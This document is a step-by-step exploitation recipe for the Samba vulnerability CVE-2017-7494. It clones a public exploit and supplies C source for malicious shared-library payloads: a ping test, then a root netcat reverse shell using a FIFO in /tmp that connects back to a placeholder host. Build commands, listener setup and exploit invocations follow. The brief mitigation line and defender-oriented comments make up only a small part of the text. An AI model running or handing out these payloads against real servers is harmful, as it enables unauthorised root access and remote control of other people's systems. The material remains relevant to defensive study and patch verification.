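# CVE-2017-7494 (Samba: a client that can write to a share can make the server load a shared library it uploaded)
# Mitigation: upgrade to a patched Samba release; as a stopgap, set "nt pipe support = no" in the [global] section of smb.conf and restart smbd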
git clone https://github.com/joxeankoret/CVE-2017-7494
#1 Create a new file named poc.c :
#####################################
#include <stdio.h>
#include <stdlib.h>
/*
 * Proof-of-execution payload: the only function in the shared object built
 * in step #2 and passed to the exploit script with --custom in step #4.
 * Presumably this is the symbol the Samba module loader calls once the
 * library is loaded; the page does not show the loader side.
 *
 * Defender's view: on a vulnerable host this shows up as a ping process
 * started through "sh -c" as a child of the Samba daemon, plus three
 * outbound ICMP echo requests from the file server.
 */
int samba_init_module(void)
{
/* Set the real, effective and saved user IDs to 0 so the command below runs
   as root; this only succeeds if the loading process is privileged. */
setresuid(0,0,0);
/* system() hands the string to the shell; "-c 3" limits ping to three echo
   requests, which is what the tcpdump listener from step #3 is watching for. */
system("ping -c 3 <IP>");
/* NOTE(review): the function is declared int but has no return statement. */
}
#####################################
#2 Build
gcc -o test.so -shared poc.c -fPIC
#3 Start an ICMP listener
sudo tcpdump -i <INTERFACE> icmp
#4 Exploit - if 3 pings show up on your listener, it worked
./cve_2017_7494.py -t <TARGET_IP> -u <USER> -P <PASSWORD> --custom=test.so
#####################################
#include <stdio.h>
#include <stdlib.h>
/*
 * Second payload variant: same entry point as the ping test, but the shell
 * command wires an interactive /bin/sh to a netcat connection towards
 * <IP>:<PORT>, where the listener from step #6 is waiting.
 *
 * Defender's view: artefacts left on a compromised host are a named pipe at
 * /tmp/f, "sh -i" and "nc" processes descending from the Samba daemon, and
 * an outbound TCP connection from the file server. Egress filtering on the
 * server blocks this callback even before Samba is patched.
 */
int samba_init_module(void)
{
/* Set the real, effective and saved user IDs to 0 so the shell runs as root;
   this only succeeds if the loading process is privileged. */
setresuid(0,0,0);
/* Recreates the FIFO /tmp/f, feeds it into an interactive shell, sends the
   shell's stdout and stderr to nc, and writes what nc receives back into the
   FIFO, so the remote end drives the shell. */
system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <PORT> >/tmp/f");
/* NOTE(review): the function is declared int but has no return statement. */
}
#####################################
#5 Build
gcc -o test.so -shared poc.c -fPIC
#6 Start a listener
nc -lvp <PORT>
#7 Exploit
./cve_2017_7494.py -t <TARGET_IP> -u <USER> -P <PASSWORD> --custom=test.so